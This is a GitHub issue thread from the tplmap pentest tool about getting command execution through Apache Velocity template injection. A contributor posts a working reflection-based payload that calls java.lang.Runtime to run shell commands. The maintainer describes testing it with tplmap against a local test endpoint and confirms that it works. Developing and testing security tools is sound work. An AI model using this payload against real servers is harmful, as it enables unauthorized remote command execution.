Command execution for Velocity template engine about tplmap HOT 4 CLOSED

Nice testing environment. Didn't noticed it.
So it seems that my $engine variable was preset on my environment (I was testing on Apache Solr). Using the "raw" Apache Velocity, we just need to assign it first. It doesn't really matter what we assign it with because we just want something to start the reflection :)
I tested using your environment and this works:

#set($engine="string")#set($run=$engine.getClass().forName("java.lang.Runtime"))#set($runtime=$run.getRuntime())#set($proc=$runtime.exec("ls -al"))#set($null=$proc.waitFor())#set($istr=$proc.getInputStream())#set($chr=$engine.getClass().forName("java.lang.Character"))#set($output="")#set($string=$engine.getClass().forName("java.lang.String"))#foreach($i in [1..$istr.available()])#set($output=$output.concat($string.valueOf($chr.toChars($istr.read()))))#end$output

Let me know if it worked for you

from tplmap.

Thank you henshin.

Valuable contribution :) However, I can't manage to get this working. Here the steps using the included test suite:

1. cd tests; ./run_java_tests.sh should start the Java environment and http test endpoint. Install any requirement if missing
2. Go to tplmap root and run ./tplmap.py -u 'http://localhost:15003/velocity?inj=*' --tpl-shell. It should start a shell where to inject bare template code on the endpoint. It supports multi-line command, press ctrl-D to send the payload.
3. Debug sent payloads and responses tracking tplmap logfile with tail -f ~/.tplmap/tplmap.log

I've tried injecting your code but I can't see any response - not even triggers any error or exception on the webserver. Can you please double-check using the same procedure? I've not a full access on my dev environment these days, but I'll be happy to dig deeper later if you can't now.

Thanks again for your help.

from tplmap.

It works flawlessly :) Thanks mate, I'm going to add this in the next few days. Thanks again!

from tplmap.

Glad to contribute 👍

from tplmap.